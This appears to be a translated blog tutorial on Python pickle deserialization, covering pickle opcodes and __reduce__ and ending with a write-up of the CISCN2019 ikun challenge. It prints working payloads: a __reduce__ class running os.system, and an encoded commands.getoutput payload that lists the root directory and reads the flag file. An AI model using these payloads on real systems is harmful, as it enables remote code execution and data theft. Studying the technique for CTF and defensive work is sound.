Python Pickle deserialization vulnerability

Foreword:

While working on the [CISCN2019]ikun challenge, I found that the knowledge point it tests is Python pickle. My earlier exposure to deserialization was all on the PHP side, so this time I will study the Python pickle deserialization vulnerability.

Basic knowledge

0x00: Pickle/CPickle
pickle and cPickle play the same role as serialize() and unserialize() in PHP. The two modules differ only in implementation: pickle is written in pure Python and cPickle in C. Their function calls are essentially the same, but cPickle performs better. (cPickle exists only in Python 2; in Python 3, pickle uses its C implementation automatically when available.) The examples below use the pickle library.

0x01: Pickle library and functions
pickle is a standard module of the Python language that implements basic data serialization and deserialization.
It serializes to a binary format. When the result is saved to a file (conventionally with the .pkl suffix), the file cannot be opened and read directly as text.

Function    Description
dumps       Serialize an object to a bytes object
dump        Serialize an object and write it to a file object
loads       Deserialize an object from a bytes object
load        Deserialize an object by reading from a file object

Let’s look at the role of these functions through a few examples:

dump/load

# Serialization
pickle.dump(obj, file, protocol=None)
    obj: the object to serialize (required)
    file: the file object to write to; it must be opened in binary write mode, i.e. "wb" (required)

# Deserialization
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
    file: the file object to read the pickled object from; it must be opened in binary read mode, i.e. "rb" (required)
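
As a minimal sketch of the dump/load pair in Python 3: the dictionary contents and the file name record.pkl below are made up for illustration and do not come from the original example.

```python
import os
import pickle
import tempfile

# Illustrative data only.
record = {"name": "demo", "scores": [1, 2, 3]}

# Write into a temporary directory; the file must be opened in binary mode.
path = os.path.join(tempfile.mkdtemp(), "record.pkl")
with open(path, "wb") as f:
    pickle.dump(record, f)

# Read it back, again in binary mode.
with open(path, "rb") as f:
    restored = pickle.load(f)

print(restored == record)   # same content
print(restored is record)   # but a newly built object
```

The round trip gives back an equal object, not the original one: load() rebuilds it from the bytes in the file.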

[Screenshot: dump/load example, modeled on one by Epicccal]

dumps/loads

# Serialization
pickle.dumps(obj, protocol=None, *, fix_imports=True)
    dumps() does not write to a file; it returns the serialized data directly as a bytes object.

# Deserialization
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict")
    loads() reads the serialized data directly from a bytes object instead of from a file.
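
A short Python 3 sketch of dumps/loads, with made-up sample data. It passes protocol=0 explicitly, because that is the old ASCII-based protocol (the default in Python 2) whose output is still readable by eye.

```python
import pickle

# Illustrative data only.
data = ["a", 1, {"k": None}]

text_form = pickle.dumps(data, protocol=0)   # oldest, ASCII-based protocol
default_form = pickle.dumps(data)            # binary protocol chosen by this Python version

print(text_form)                             # short opcodes separated by newlines
print(pickle.loads(text_form) == data)
print(pickle.loads(default_form) == data)
```

Both forms deserialize to the same list; only the encoding of the stream differs.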

[Screenshot: dumps/loads example]

In Python 2, dumps() returns a readable string. What do these serialized strings mean, and by what rules are they generated? Answering that requires looking at the PVM, because it underlies the whole process of Python serialization and deserialization.

0x02: The role of PVM

Python can run a program directly from its source code: the interpreter compiles the source into bytecode and hands the bytecode to the Python Virtual Machine (PVM) for execution. In short, the PVM is the engine that interprets bytecode.

0x03: PVM execution process
Running a Python program involves two steps.

1. The interpreter compiles the source code into bytecode.

   Bytecode is a Python-specific intermediate form. It is not native machine code, so the machine cannot run it directly; the PVM has to interpret it. If the Python process has write permission on the host, it saves the bytecode of imported modules in a file with the .pyc extension. If it has no write permission, the bytecode exists only in memory and is discarded when the program exits.

2. The Python process passes the compiled bytecode to the PVM (Python Virtual Machine), which executes the bytecode instructions one after another until all operations are complete.

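
The two steps can be observed from inside Python with the built-in compile() and exec() and the standard dis module. This is only an illustrative sketch; the source string is made up, and the exact instructions printed by dis vary between Python versions.

```python
import dis

source = "x = 1 + 2\nprint(x)"

# Step 1: compile the source text into a code object that holds bytecode.
code = compile(source, "<demo>", "exec")
print(type(code).__name__)        # code
print(isinstance(code.co_code, bytes))

# Human-readable listing of the bytecode (version dependent).
dis.dis(code)

# Step 2: hand the code object to the virtual machine for execution.
namespace = {}
exec(code, namespace)
```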
0x04: The relationship between PVM and Pickle module

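The pickle format is in effect a small stack-based programming language: a pickle stream is a sequence of opcodes, and the unpickler that interprets them is a lightweight virtual machine of its own (often called the Pickle Virtual Machine, separate from the bytecode interpreter described above).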

This lightweight PVM consists of three parts:

Instruction processor:

Reads opcodes and their arguments from the data stream and interprets them. It repeats this in a loop, updating the stack and the memo as it goes, until it reaches the end marker. The value left on top of the stack at that point is returned as the deserialized object.

Stack:

Implemented as a Python list and used as temporary working storage while the stream is processed. Deserialization proceeds by pushing values onto the stack and popping them off again, and the final result ends up on top of the stack.

Memo:

Implemented as a Python dictionary (dict). It acts as an index that lasts for the whole run of the PVM: data that has already been deserialized is stored in it as key-value pairs so that it can be used again later.

The opcodes handled by the instruction processor are readable, and a few of them matter most here:

c: Read the rest of this line as the module name and the next line as the object name, then push module.object onto the stack (typically a class or function)
(: Push a mark object onto the stack. It records where a group of items begins and is usually paired with the t opcode to build a tuple
S: Followed by a quoted string. Read the quoted text up to the newline character and push the resulting string onto the stack
t: Pop items off the stack until the mark pushed by ( is reached, build a tuple from them in the order they were pushed, and push the tuple onto the stack
R: Pop the argument tuple and then the callable beneath it, call the callable with the tuple as its arguments, and push the result onto the stack
.: End the deserialization; the value on top of the stack is the result

These six are the opcodes seen most often in pickle streams, and they can be understood together with the figure below.

[Figure: illustration of the opcodes above]
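
To make the instruction processor, stack and memo concrete, here is a toy interpreter for just the six opcodes listed above. It is a sketch for study, not how the pickle module is implemented: toy_loads is a hypothetical name, string escapes are not handled, and the hand-written stream calls the harmless built-in len.

```python
import importlib
import io
import pickle


def toy_loads(data):
    """Interpret a tiny subset of protocol-0 pickle: c ( S t R and '.'."""
    stream = io.BytesIO(data)
    stack = []        # the stack is a plain Python list
    memo = {}         # kept to mirror the real design; these six opcodes never touch it
    mark = object()   # sentinel pushed by '('

    while True:
        op = stream.read(1)
        if op == b"c":      # module line, then name line
            module = stream.readline()[:-1].decode("ascii")
            name = stream.readline()[:-1].decode("ascii")
            stack.append(getattr(importlib.import_module(module), name))
        elif op == b"(":    # push the mark
            stack.append(mark)
        elif op == b"S":    # quoted string up to the newline
            line = stream.readline()[:-1].decode("ascii")
            stack.append(line[1:-1])   # strip the quotes (escapes not handled)
        elif op == b"t":    # collect everything above the nearest mark
            items = []
            while True:
                top = stack.pop()
                if top is mark:
                    break
                items.append(top)
            stack.append(tuple(reversed(items)))   # restore push order
        elif op == b"R":    # call callable(*args) and push the result
            args = stack.pop()
            func = stack.pop()
            stack.append(func(*args))
        elif op == b".":    # stop: top of stack is the result
            return stack.pop()
        else:
            raise ValueError("unsupported opcode: %r" % (op,))


# Hand-written stream meaning: len('hello')
demo_stream = b"cbuiltins\nlen\n(S'hello'\ntR."
print(toy_loads(demo_stream))      # 5
print(pickle.loads(demo_stream))   # 5
```

Like the real unpickler, this toy will import and call whatever the stream names, which is exactly the property the rest of the article exploits.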

0x05: Deserialization analysis
Putting the examples above together, the serialization process can be divided into three steps:

1. Extract all attributes from the object
2. Write the object's module name and class name
3. Write the key-value pairs of all of the object's attributes

Deserialization is the reverse of the serialization process.
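
These steps are visible in a protocol-0 stream. The sketch below pickles an argparse.Namespace, chosen only because it is a ready-made plain class whose module name is the same however the script is run; the attribute names and values are made up.

```python
import argparse
import pickle

# A plain object with two attributes (illustrative values).
obj = argparse.Namespace(name="kun", level=6)

blob = pickle.dumps(obj, protocol=0)
print(blob)

# The module name, class name and attribute key-value pairs all appear in the stream.
for piece in (b"argparse", b"Namespace", b"name", b"kun", b"level"):
    print(piece, piece in blob)

# Deserialization reverses the process and rebuilds an equal object.
restored = pickle.loads(blob)
print(restored.name, restored.level)
```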

0x06: Pickle/CPickle deserialization vulnerability analysis
Pickle deserialization vulnerabilities revolve around the __reduce__() magic method. It plays a role similar to the __wakeup() magic method in PHP, in that it takes effect automatically as part of the serialization and deserialization process without being called explicitly. Hooks of this kind are exactly where deserialization vulnerabilities tend to appear.

During deserialization, the language has to rebuild its own data structures from the serialized string, which means acting on whatever the parsed data describes. If that data is controlled by an attacker, the result can be a remote code execution (RCE) vulnerability.

In addition, pickle.loads takes care of imports itself: it automatically tries to import any module named in the stream that has not been imported yet. In other words, the code-execution and command-execution functions of the entire Python standard library are within reach.
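
The automatic import can be seen with a harmless hand-written stream. In this sketch the script never imports calendar itself; the stream names calendar.isleap and the I opcode (a decimal integer line, not covered in the list above) supplies the argument.

```python
import pickle
import sys

# Hand-written protocol-0 stream meaning: calendar.isleap(2024)
leap_stream = b"ccalendar\nisleap\n(I2024\ntR."

print("calendar" in sys.modules)   # usually False in a fresh interpreter
result = pickle.loads(leap_stream)
print(result)
print("calendar" in sys.modules)   # the module has been imported by loads()
```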

Finally, let's take a look at this magic method.

__reduce__()

When __reduce__() returns a tuple, the first element is a callable object, which will be called to create the object during deserialization. The second element is a tuple of arguments for that callable. This matches the R opcode of the PVM described above:

Pop the argument tuple and then the callable beneath it, call the callable with the tuple as its arguments, and push the result onto the stack

In fact, the R opcode is how the return value of __reduce__() is carried out. pickle calls __reduce__() automatically while serializing and writes the callable and its arguments into the stream; when the stream is deserialized, R calls that callable. If an attacker controls the stream, and with it the function and its arguments, the Python process will execute malicious code.
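
A harmless sketch makes the timing visible. The class name Demo and the calls list are made up for illustration, and the callable is the built-in sorted rather than anything dangerous.

```python
import pickle

calls = []


class Demo:
    def __reduce__(self):
        calls.append("__reduce__")        # record when this method runs
        return (sorted, ([3, 1, 2],))     # callable plus its argument tuple


blob = pickle.dumps(Demo())
calls_after_dumps = list(calls)
print(calls_after_dumps)     # __reduce__ ran while serializing

result = pickle.loads(blob)
print(calls)                 # unchanged: loads() did not call __reduce__
print(result)                # the return value of sorted([3, 1, 2])
```

Note that loads() does not give back a Demo instance at all. It returns whatever the callable returned, which is why an attacker is free to name any importable function.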

Note:

In Python 2, only new-style classes have the __reduce__ method, that is, classes declared as class A(object). In Python 3, every class is a new-style class by default.

0x07: Deserialization exploit
Where the vulnerability may appear:

When parsing authentication tokens and sessions
When objects are pickled and stored as files on disk
When pickled objects are transferred over the network
In parameters passed to the program

Command execution

# Modeled on Epicccal's example
import pickle
import os

class Test2(object):
    def __reduce__(self):
        # Argument for the function to be called
        cmd = "/usr/bin/id"
        return (os.system, (cmd,))

if __name__ == "__main__":
    test = Test2()
    # Serialize
    result1 = pickle.dumps(test)
    # Deserialize; this is where os.system(cmd) actually runs
    result2 = pickle.loads(result1)

# Return value of the __reduce__() magic method:
#     return (os.system, (cmd,))
# 1. It returns a tuple with two elements
# 2. The first element is the function to call: os.system
# 3. The second element is a tuple of arguments: (cmd,)
# 4. So the call carried out during deserialization is os.system("/usr/bin/id")
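
To look at what such a payload contains without running it, the standard pickletools module can disassemble the stream. This sketch repeats the Test2 class from above and never calls loads(), so the command is not executed; the module name shown next to system depends on the operating system.

```python
import io
import os
import pickle
import pickletools


class Test2(object):
    def __reduce__(self):
        return (os.system, ("/usr/bin/id",))


# Building the payload only records the callable and its argument.
payload = pickle.dumps(Test2(), protocol=0)

listing = io.StringIO()
pickletools.dis(payload, out=listing)   # static disassembly, nothing is called
print(listing.getvalue())
```

The listing shows a GLOBAL naming the system function, the argument string inside a tuple, and then REDUCE, which is the R opcode described earlier.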

Topic training
0x00:[CISCN2019 Division Day1 Web2]ikun
The earlier steps of the challenge are not described in detail; here we start directly with the pickle deserialization vulnerability.

The settings.py file contains a hint, which has to be Unicode-decoded.

[Screenshot: hint in settings.py]

Reading the source code shows that the backdoor is in Admin.py.

[Screenshot: Admin.py source]

self.render('form.html', res=p, member=1)
This line looks up the template file form.html, renders it, and displays the resulting page.

Take a look at the form.html page

[Screenshot: form.html]

This shows that the value passed in is echoed straight back to the page, and that custom classes can be serialized and deserialized, so there is a pickle deserialization vulnerability. We can therefore construct a payload with pickle.dumps that, once deserialized, reads the flag or other information.

To construct the payload, use the __reduce__(self) method: first find the location of the flag file, then read it.

But there are a few things to note:

# os.system and os.popen
os.system runs a system command and returns once it has finished; its return value is the command's exit status (generally 0), not its output
os.popen() returns a file-like object rather than the command's output, so the output is only available after calling read() on it

With either function, the command output would only be seen if it were explicitly read and printed. Returned as-is from __reduce__, the value that reaches the page does not contain the output.

After some searching, I found that the function commands.getoutput() can be used instead to construct the payload, because it returns the command's output as a string.
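
The difference between the three calls can be checked locally. This sketch is Python 3, where the commands module no longer exists and subprocess.getoutput is its counterpart; echo hello is just a harmless stand-in command.

```python
import os
import subprocess

cmd = "echo hello"

status = os.system(cmd)                 # output goes to stdout; only the status is returned
pipe = os.popen(cmd)                    # a file-like object, not the text itself
text_from_pipe = pipe.read()            # the output appears only after read()
pipe.close()
captured = subprocess.getoutput(cmd)    # the output comes back as a string

print(status)
print(repr(text_from_pipe))
print(repr(captured))
```

Only the last form hands the output back directly as the return value of a single call, which is what a __reduce__ payload needs.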

# coding=utf8
# Python 2 only: the commands module and the print statement do not exist in Python 3
import pickle
import urllib
import commands

class payload(object):
    def __reduce__(self):
        return (commands.getoutput, ('ls /',))

a = payload()
print urllib.quote(pickle.dumps(a))
# ccommands%0Agetoutput%0Ap0%0A%28S%27ls%20/%27%0Ap1%0Atp2%0ARp3%0A.
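
The URL-quoted payload printed above can be decoded and disassembled in Python 3 to see the opcodes discussed earlier. This is only an inspection sketch: it deliberately does not call pickle.loads, which would fail on Python 3 anyway because the commands module is gone.

```python
import io
import pickletools
from urllib.parse import unquote_to_bytes

quoted = "ccommands%0Agetoutput%0Ap0%0A%28S%27ls%20/%27%0Ap1%0Atp2%0ARp3%0A."

# Undo the URL quoting to recover the raw protocol-0 stream.
raw = unquote_to_bytes(quoted)
print(raw)

listing = io.StringIO()
pickletools.dis(raw, out=listing)   # static disassembly; nothing is imported or run
print(listing.getvalue())
```

The listing contains the c, (, S, t, R and . opcodes from the list above, plus p (PUT), which stores the value on top of the stack in the memo.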

The listing reveals the flag.txt file, so all that remains is to read it:

return (commands.getoutput, ('cat /flag.txt',))

Often, though, you need to run several functions or several commands in one go, and __reduce__ alone is not enough.
The problem is that __reduce__ can only call one function at a time, so when exec is disabled, multiple statements cannot be executed in a single payload.

 
